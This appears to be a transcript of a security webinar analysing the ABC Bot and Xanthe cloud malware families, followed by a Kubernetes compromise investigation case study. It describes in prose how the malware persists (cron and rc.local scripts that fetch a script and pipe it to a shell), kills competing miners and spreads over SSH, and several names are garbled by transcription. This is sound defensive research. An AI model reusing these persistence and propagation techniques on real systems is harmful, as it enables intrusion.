 Thank you very much, so good afternoon everyone, and yet my name is Al Carquhey, I'm a solutions engineer at Cado Security with about 20 years of cybersecurity experience from a time in the Royal Air Force and leading incident response engagements at PWC UK. Hello everyone, I'm Matt Muir and I'm a threat intelligence researcher at Cado Security. Prior to working at Cado, I was a macOS malware researcher and I've got a background in DevOps, digital forensics and operational cybersecurity. Great, thank you very much Matt. So to kick things off, I just walked through the agenda. So during this webinar Matt and myself will talk about the challenges we've heard from cloud users about performing investigations of compromised cloud assets. Matt will provide a briefing on a threat act group that has been targeting cloud assets for financial gain using crypto coin miners. I'll be walking through a Kubernetes compromise case study, and then we'll wrap up with the key takeaways and some of the question and answers. So, I always think it's important to start off to talk about the challenge itself. So let's face it, performing an in-depth investigation in the cloud is extremely complex and time consuming process. And according to recent research by the ESG, organisations are four times likely to say investigations and incident response is more difficult in cloud environments versus traditional on-premise environments. When asked about the leading challenges security teams faced when it came to performing cloud investigation, lack of visibility and context was the number one response. This has got a lot to do with the ephemeral dynamic nature of cloud resources, such as containers. Since we'll be talking about Kubernetes today, I thought it'd be quite an interesting stat to touch on, where 50% of the survey respondents actually reported that it'd be simply impossible for them to investigate an incident in which it impacted their container environment. So now I'd like to hand it over to Matt for his briefing on the threat act group that's been targeting cloud assets. Thanks Al. So as part of Cado Labs, Cado's threat research team, I'm regularly involved in conducting research into new software threats affecting cloud infrastructure. In this section I'm going to discuss an emerging malware family we've been tracking since the end of 2021 named ABC Bot. As we'll see, ABC Bot is a botnet that targets insecure cloud compute instances. Currently, it targets cloud service providers such as Alibaba and Huawei Cloud, but the techniques it uses for initial infection and propagation mean it could realistically target instances from any cloud service provider. So to give a quick overview of ABC Bot, the malware includes payloads consisting of shell scripts and elf executables with the shell scripts in particular displaying some notable capabilities. These capabilities include self propagation in a worm-like fashion, using information about cloud security services and competing malware campaigns to disabled competitors, and registration of persistence via common Linux persistence techniques. So to provide some context around ABC Bot, the campaign was originally reported on November 2021 by 360NetLab. 360NetLab focused their analysis on the elf payloads used to connect the infected machine to the botnet. For this reason, we won't cover this today and will instead cover one of the installation shell scripts used to propagate the malware and download additional payloads. We believe this script reveals more about the attacker's capabilities and objectives, which we'll discuss further in the coming slides. Let's begin by taking a look at an interesting capability displayed by this malware family, the killing of competitors. One thing that is immediately clear from analysing this initialisation script is that the developers behind ABC Bot are really invested in killing off competing miners. The function that you can see on screen here is dedicated to removing artifacts of the competing malware campaigns and mining software such as XenRig. The malware also searches for malicious Docker images and removes or kills them as appropriate. This suggests targeting of misconfigured Docker API endpoints, which is a common infection vector in cloud environments. Clearly, the ABC Bot developers had invested significant time into researching cloud security threats, given the previous slide. However, the developers also demonstrated a knowledge of cloud security mechanisms as the disabling of security services native to the CSPs targeted was also performed. This allows their malware to execute unimpeded and also allows us as analysts to determine the targets of the campaign. For example, several lines were dedicated to killing processes associated with the Alibaba and Tencent cloud security agents, as we can see on screen here. The knowledge of malware research will know that persistence is a key objective for most malware samples. ABC Bot is no different. Persistence for the ABC Bot initialisation scripts was established via an RC script in Cron. This is common on Linux and Unix systems. Once registered, the persistent scripts periodically try to retrieve a copy of the current script and execute it on the fly by piping it through SH. Persistence ensures that the script is always running and is kept alive in the event that a user or another process in the system attempts to hold execution. Another key objective of most malware campaigns is to establish network connectivity to allow bidirectional communication with the attacker. This is known as command and control or C2. In a function named IP tables checker, the developer behind ABC Bot configures the Linux IP tables firewall to drop or accept traffic based on port numbers and source IP addresses. This particular function gave us some insights into the state of the campaign at the time of analysis. For example, it is clear from this function that the malware is under active development as the author has left commented code. In one of the commented rules, it appears as if the developer configured IP tables to accept all ingress traffic from our mobile IP. This was likely a command and control server under the attacker's control. Another commented rule drops ingress traffic from ports 2375 and 2376. These ports are typically associated with the Docker engine API. We suspect this was added at one point to prevent attempts to halt execution of any malicious Docker containers the malware creates. A check is also done to see whether these rules are already in place, but if they aren't, they are no longer added. Instead, a more generic rule is added to allow all ingress traffic to a non standard port number of 26800. Interestingly, URLs embedded in the malware also made use of this port. Another notable technique of ABC but was the ability to infect related hosts with a copy of itself. As we can see on the slide, the malware checks for the existence of roots SSH known hosts file and corresponding public key. If these files are found in roots SSH directory, known hosts are enumerated and a copy of the installation script is run on the remote host. This ensures propagation of the malware in a worm-like fashion and could result in an organization's entire cloud estate being rapidly compromised. So now that we've covered some of the notable capabilities of ABC but let's discuss an unexpected finding that emerged during analysis of this campaign. When analyzing ABC but we were initially under the impression that we were analyzing a relatively new malware family. Continued analysis revealed that this malware had a longer history than we initially thought. Back in late 2020, Cisco's Talos security research team reported on an emerging cloud cryptojacking malware campaign that they named Zante. We discovered a link between ABC bot and Zante when conducting analysis on the infrastructure behind the ABC bot campaign. Additional comparison of the code used in samples in both campaigns confirmed our suspicions. Before discussing the similarities between these malware families, let's have a brief overview of Zante itself. So Zante is a family of cryptojacking malware with the primary objective of hijacking system resources to mine the Monero cryptocurrency. In order to mine Monero on target systems, the common open source miner X and rig is deployed. Zante also spreads via exposed Docker API endpoints with an initialization script responsible for propagation, network scanning and downloading of additional payloads. Zante's additional payloads includes an open source library for hiding processes, a script to disable security services and kill completing miners and the X and rig binary itself. This will probably sound familiar if you're paying attention to the previous section of this talk. Let's take a closer look at some of the signs that demonstrate these campaigns are linked. So in the report published in late 2020, researchers from Talos commented on the coding style present in the Zante scripts they analyzed. They highlighted that in the samples analyzed, function declarations were located at the top of the script and function invocation was conducted at the bottom. Talos suggested this likely aids testing new iterations with function calls commented or uncommented as necessary. Although this is a fairly tenuous link, it's interesting to note that samples from both the ABC bot and Zante campaigns follow this convention. So diving deeper into the samples themselves, we see several of the functions in Zante have identical names to those in ABC bot. Some of the functions also have the string go appended to the end of their names. This is another convention observed in both campaigns. We identified five functions with identical naming that you can see on the slide here. Subsequent analysis of each of the above functions was performed to determine whether they were semantically equivalent. The first function we encountered that appeared in both campaigns was called name server check. This function is responsible for configuring the target system to allow DNS requests to be made to the internet. It achieves this by checking whether the IP for Google or Cloudflare's public DNS server is present in the xaresolved.con file. If it isn't, the script then adds it. The ABC bot version of this function is much larger than the Zante equivalent and has additional functionality. This suggests that ABC bot is an iteration of Zante, which also makes sense given it was discovered a year later. More importantly, the lines dedicated to configuring DNS are identical between both campaigns, as can be seen in the screenshot on this slide. As I mentioned before, resistance is a key goal of most malware campaigns. Given this, it's unsurprising that the function on screen was present in both ABC bot and Zante. As the name suggests, this function is responsible for achieving persistence via cron, the task scheduler which is present in virtually all Linux distributions. Since cron is pretty much ubiquitous, this is a common method of persistence on Linux systems, so isn't necessarily notable in itself. However, analysis of this function revealed further links between the ABC bot and Zante campaigns. One example of this was the presence of a comment from the developer regarding additional logic to determine whether cron was running. This line appeared in samples analyzed from both campaigns and the wording was identical. The lines of the cron entry itself are also of interest. Part of the cron entry consists of a curl command with a defined user agent string. The string used in both Zante and ABC bot samples can be seen highlighted in the screenshot. Interestingly, one of the payloads downloaded by the malware also used this string as it's name. Existence of a unique string such as this between the two campaigns seems more than coincidental and suggests that server-side code from both campaigns expects us to be present in the user agent. Similar to the previous slide, this was another function responsible for registration of persistence, except this time via RC scripts. RC scripts allow code to be run at boot or login and similar to cron are particularly useful for malware persistence. This is another common technique, although perhaps less so than cron. Looking at the code within this function again, we noticed identical commenting between both samples. The functionality of check RC is similar to cron check go. Persistence is achieved by writing shell commands to RC dot local, which is one of the RC script files. The shell commands are used to invoke the curled data transfer utility with a unique user agent string. This downloads a copy of the current script and pipes it through SH to ensure it's kept running. Version numbers are also appended to the user agent string suggesting iteration of the sample. Similarly, the lines responsible for creating the RC script are virtually identical across both campaigns. At this point in the analysis, we noted that the structure of the code, wording of two-to-comments, wording of log statements and several lines of code were identical in samples of both ABC bot and Zanzi. I mentioned previously that ABC bot downloads additional payloads to connect it to a botnet. The one-go function is responsible for downloading these payloads and performing additional configuration of the target system. There were more differences observed in the ABC bot versus Zanzi versions of this function than any of the others. Some lines are identical, however. In Zanzi, the developer configures the huge pages feature via modification of the appropriate kernel parameter. This likely facilitates cryptocurrency mining by configuring the system to support memory pages greater than default. In ABC bot, we see these lines commented out. This, combined with prior analysis of payloads downloaded by this function, suggests that the objective has changed from cryptojacking in Zanzi to more traditional botnet activity in ABC bot. Despite this, it's worth noting that the semantics of the two versions of this function are similar. Processes are enumerated to check whether this machine is already being compromised by ABC bot or Zanzi. If malicious processes are found, this is logged. If not, the process is launched as necessary. So hopefully we've illustrated the similarities between certain functions found in both of these malware campaigns. At this point in our analysis, we were fairly convinced that these samples were linked. However, there are some additional findings to note. We mentioned that propagation via enumeration of known hosts was a notable capability of ABC bot. This exact same technique was used in the samples of Zanzi we analysed. Examples of the code responsible for this can be seen on the slide. In ABC bot, a number of malicious users were added to the system to facilitate a backdoor. The usernames added to the system were identical in samples from both campaigns. While this could be an attempt by one threat actor to copy another, we believe that our prior findings indicate that this is more than coincidental. Moving on now to our final and most important finding. Although each of the similarities we've discussed were enough to give us reasonable suspicion that these campaigns were linked, we needed one final piece of evidence to conclusively link the campaigns. We already discussed the function from ABC bot named IP Tables Checker, which was responsible for configuring IP tables to allow ingress traffic from a non-standard port. An incredibly similar version of this function was also found in this anti-sample we analysed. Not only that, but rules used within this function to allow traffic from a C2 server included the same IP address in both Zanzi and ABC bot. This constitutes an overlap of infrastructure. The server at that IP address would have to be under the control of the developer behind both ABC bot and Zanzi for it to be usefully included in this script. Of course, they're unlikely to include this if it wasn't a part of their own infrastructure. We believe that this is the strongest indicator yet that these campaigns are linked and the same threat actor is responsible. So to summarise, the ABC bot and Zanzi campaigns show the sophistication of malware developers in the cloud security space. Although code reuse is common in malware, we've highlighted an overlapping infrastructure and identified reuse of unique strings, which would be difficult or pointless for someone to copy. If the same threat actor is behind these campaigns, we believe this indicates a shift away from cryptocurrency mining, a common objective of cloud malware, on to potentially more destructive bot net activities. So I'll hand you back to Al now for a case study on another attack with similar TTPs, except this time targeting Kubernetes clusters. Thanks Matt. So yes, in this case study, I'll be walking through an investigation of a comprised Kubernetes node, which was ultimately resulted in attacker gain access to the AWS console. The case study used the tactics techniques and procedures from threat actor group that is focused on comprising containers or the systems that we run on. So here we have an overview of the setup that was deployed and compromised. In the centre of it all is an EKS cluster with three nodes running a simple application. The nodes were configured with the Kubernetes controller API exposed to the internet. And in addition to the cluster, AWS GuardDuty and CloudWatch were enabled to provide external logging and monitoring capabilities, along with the deployment of our creative response platform, which we use for data capture and processing. With organisations moving services to container-based cloud systems, and as you've heard from Matt's coverage of ABC buttons and things, threat actors are actively looking for exposed and poorly configured Docker or Kubernetes APIs to exploit. Once the exploitation is achieved, threat actors will look to complete their immediate objectives of deploying column miner and then look for further systems to compromise whether those are local or delivered via C2 command control from internet-based systems. So what's the worst that could happen? Well, if I say that typically, and as Matt's mentioned already, most of the time is for boring coin mining. But I think you could go further than deploying applications like XMRAG. So, for example, threat actor could exploit their access to perform data exfiltration, which could be part of a ransomware attack. Utilising user accounts on systems that have been compromised for lateral movement. If they were able to break out of the container environment, this could lead to an attacker being able to spin up or destroy other containers, or worse, expand their access to the cloud infrastructure level itself. And then from there, they could modify and create cloud user accounts and use these access to gain access or observe other resources or areas of the cloud environment, where maybe key or sensitive data may be stored. So now that we've covered the setup and environment and what threat actors can do, let's move on to how we perform the investigation. A critical component to any investigation is data. If you don't have access to all the necessary data sources and the data that I've been able to process and analyse, then you're not likely to be able to confirm threat actor actions, or you are likely to miss their activity altogether. Here we show the data sources that we use during the investigation, and we'll have some examples of them as we go through our presentation. So I'm looking at the value of what cloud provider logs can replace. So cloud trail can provide you with an audit of what's happening within your account. So, for example, new user account has been created, or the IP address is associated with a console logon. CloudWatch can provide you with system usage telemetry, which can be used to identify abnormal system activity such as high CPU or memory usage, both of which are good indicators of heavy workloads can associate with crypto manual. From a network telemetry perspective, VPC flow logs can show abnormal network connections, which have been made from systems themselves. This can be tied into the GuardDuty system, or GuardDuty logs, which is AWS's providing threat detection to show connections that may be associated with tort exit nodes. So here we have an example of the VPC flow logs, which have been processed using the CatoResponse platform. This top section shows a network connection to an IP address, which, when you look it up, resolves back to PaySpin. We've seen PaySpin being used to host malicious scripts, and seen as a common mechanism to distribute that code to compromise systems. This bottom section shows SSH network traffic from attacker systems to the Kubernetes node itself. One thing to note here, the VPC flow logs don't necessarily appear in order of the network connection establishment. So, for example, the first event shows the network connection flow from PaySpin to the node, and the second event shows the flow from the node to the PaySpin. And it would be expected to be the other way around, as it was the node itself that initiated the connection to PaySpin. The benefits you can get from doing a disk-based analysis. So having access to the full disk allows analysts to run additional detection or investigation tools, which can then help identify malicious files or for actual activity. One of the main benefits of that is that you have access to file contents themselves, and then as you're going through your investigation, you can look into the contents of those files. Whereas if you don't do that collection in the first place, you'll end up having to do repeated multiple collections from that target system. Having access to that data can also allow analysts to identify potentially staged data for exaltration and also historical data such as user command line activity. In this example, where we process the disk image of the Kubernetes node, we can see that we've got a log entry event for a successful SSH connection, where the attacker was able to access the nodes using the root user account. From this point, as part of the investigation expanded, we reviewed the contents of the authorised key file in the rootusers.ssh folder, and then from there we find an unknown SSH key had been added to that file. Looking now at memory analysis, so memory analysis can provide visibility of the runtime information and can show details of what processes were running, including some of the command line arguments. An analyst can use this information to establish what libraries and drivers were loaded for each of the processes, and also can aid with the identification of road processes or code injection. Long with process details, memory analysis can provide network connection information associated with those processes and command line history that has been effectively written to disk or files that a particular process has been accessing. Memory analysis can also provide the analyst's ability to extract those files and process executables from the capture, and those can then be further analysed using additional tools, and in which they may can lead to additional indicators and use for identification of other affected assets. Additional context around processes such as the timestamps, and especially around the network can help with understanding the order activity that's taking place. Some things to note from doing memory capture and analysis. The memory capture itself, it's from a moment in time, so you may not find that as much historical through activity as you think. Looking for false, look out for false positives from things like activity signatures, if that system is running software such as AB. It can be tricky to perform the capture and analysis of memory from cloud-based systems, so be careful that you don't take the environment too much. Analyzing network connections highlighted suspicious network traffic when we looked at this. Here we have an aptly named process called NCAT, and it has a connection to an unknown remote IP address. Looking for additional processes with connections to that same IP address, we identified that a bash process also showed the same network connection information. When we look at the process listing, we can see that the NCAT and bash processes have the same start time. On systems that are running containers, each of those container processes will have its own container-chim component part. Expanding these, we find that our suspicious process bash is also a child process of the aptly named NCAT, which is running on a container that's also running an NGNX process. So when we pull all this information together, we can see a lot more of the picture. So using each of the data sources, we've mapped out where we identify through activity. No one single source of information showed the full picture. Having to look at this in totality, we'll enable analysts to confidently answer the questions such as what happened, when did it happen, and how did it happen. When we pull this information together in a combined timeline, you can see network connections by attacker onto the node itself. These were followed by attempted connections to a URL associated with crypto mining, followed by Kubernetes API audit log showing the launch of an XMRA container. And finally, the creation of an AWS account itself, and then that account being assigned with the IAM full access policy. In this example, we've assessed that the attacker's intent is more financially motivated with the distribution and execution of XMRA point minor. However, their ultimate access could potentially lead to greater problems with that additional account being created with the full access for the IAM policy. And that could then allow them access to additional areas of the platform and cloud area and have unauthorised access to data. So, some key takeaways. Organisations are moving their opportunities, their operations and capabilities to the cloud. The threat actors have already been operating in cloud based systems, and they are affixed while exploiting their knowledge and experience of it to achieve their objectives. As mentioned in match review of ABC Botans and Thing, threat actor groups, and demonstrated in this case study, API endpoints are actively being sought and if poorly configured could lead to the exploitation and compromise the node and potentially further systems and resources. Setting up automation is a key function of being able to do Kubernetes investigations. It must be quick to capture all the data that's necessary to fulfil a full investigation. If not, then you're going to lose some of that and then you'll not be able to do that complete and effective function. Utilising the full potential of monitoring and not only from your systems themselves but also from client providers. So, we can have traditional triage disk memory data that will provide security teams with the means to answer those key questions of what happened, when did it happen and how did it happen. So, thank you for your time this afternoon, and I'll pause here now for a minute to let anyone post any questions that they have into the Q&A box. Question, there have been many recent malware botnets that have specifically targeted Chinese cloud providers. Why do you think this happens? Matt, I think this is a good one for you. So yeah, we're not entirely sure why this is the case, but for the guess I'd say that many of these CSPs are newer than for example AWS or some of the other bigger cloud providers. So, this is security controls are not as mature as some of the larger CSPs, which makes compute instances running under them and easier target for attackers. I've also got another question. How is access gained to install the RC scripts? Yeah, I could probably take that as well. So, this is something that's a really good question because it's not completely clear. And I think because a lot of these campaigns we're looking at were historical, so identifying the initial infection vector is pretty difficult. But we believe that malware spread via exposed Docker engine API endpoints, so it seems likely the remote commands are sent to the server with Docker potentially running under root post compromise. So these commands can be used to download the initialization cell scripts or attempt to escape the container and run those commands on the box itself. Right. Investigating a potentially compromised container is a huge blind spot for us. So when you say automation, what does that actually mean? Automating your investigation should look at all your data sources. So, if you have that ability to utilize capable things like source or sole platforms, you can create playbooks, which will could be triggered from a high fidelity trigger. And then use that to automatically go and capture or initiate the capture of your data. Bring that into a central place. Get it processed and then have it accessible to the entire security team to allow the analysts to then concentrate on working on the investigation itself and not necessarily worrying about what data needs to be captured and where is that going to be stored. So what Kubernetes info or forensics opportunity might be lost if not actively managed and collected. So one thing that we've seen is with regards to kind of containers, those systems themselves when they're in their due to their nature, they can be easily spun up and easily destroyed and torn down. And unfortunately, is that aspect of being torn down, being able to collect information from there becomes then a problem. Okay. Thank you everyone for your time this afternoon. And we'll follow up with any of the questions that were not answered by email, but now I'll hand back to Marissa from the Linux Foundation. Wonderful. Thank you so much Alan Matt for your time today and thank you everyone for joining us. Excuse me. Just a quick reminder that this recording will be up on the Linux Foundation's YouTube page later today. So we hope you will join us for future webinars and have a wonderful day. Thank you.